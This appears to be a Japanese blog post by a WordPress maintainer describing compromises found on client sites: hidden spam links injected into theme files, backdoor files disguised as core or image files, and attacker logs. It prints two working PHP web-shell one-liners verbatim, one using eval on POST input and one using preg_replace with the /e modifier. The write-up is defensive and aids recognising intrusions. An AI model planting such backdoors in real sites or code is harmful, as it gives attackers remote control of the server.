改竄被害の実例

数百のWordPressを見てくると改竄被害もよく見る。

手元に残ってたファイルから改竄の実例を残す。

テーマ改竄

footer.phpに外部リンクが勝手に挿入されている。 

<div style="position: absolute; top: -355px;left: -915px;"><a href="http://...">ルイヴィトンiphoneケース</a></div>

日本語だけどリンク先は台湾ドメインで犯人は謎…。
htmlだけで大したことないと思うなら違う。
不正にログイン成功されて管理画面からテーマ編集できてるのでこの時点でもうアウト。
テーマ編集できるならPHPも使えるのでなんでもやられる。
改竄被害の原因のほとんどはブルートフォースアタックからの不正ログイン→管理画面からテーマやプラグインの編集。

昔から投稿でPHP使えるようにするプラグインは使うなと言われてる理由もこれ。何万回言っても使いたがる人は出てくるけど。

WP本体のファイルに偽装

不正ログインしてPHPが使えるようになったらどうするかというと
wp-admin/wp-includes/ 以下にファイルを作る。
素人が見てもまず気付かない。そもそも見ない。

wp-conf1g.phpreadme.php もあった。

気付かない所で攻撃してるので世の中のWPの大半は気付いてないだけですでに被害受けてると思っている。引き継いだWPのほとんどが被害を受けていたけど前任者は全く気付いてない。

具体的な症状は勝手に別サイトにリダイレクトされるなど。検索結果から来てもリダイレクトされるのでGoogleからはマルウェアの警告が表示される。Search Consoleにはセキュリティの問題ありとされる。

PHPのようで画像のようでPHP

class-wp-user.php なんて名前でOSでプレビューすると画像だけど中身をよく見るとPHPコードが仕込まれてる。

<?php @eval($_POST[cmd]);?>

ログを残してる

log.htmltime.html があって前回のログを残してる。
ログを残すほど何度もやってきてる。

その他

暗号化というか難読化されてるコード書いても仕方ないしそんなに書ける例はなかった。
大体は外部から受け取ってるか

<?php if($POST["reg"]<>""){@preg_replace("/[checksql]/e",$_POST['reg'],"saft");}?>

base64をdecodeして何か実行している。

一応中国語?のコメント入りPHPファイルとかも残ってるけど全く分からないので。

最近は新たな被害出てないので見つけたらまた書く。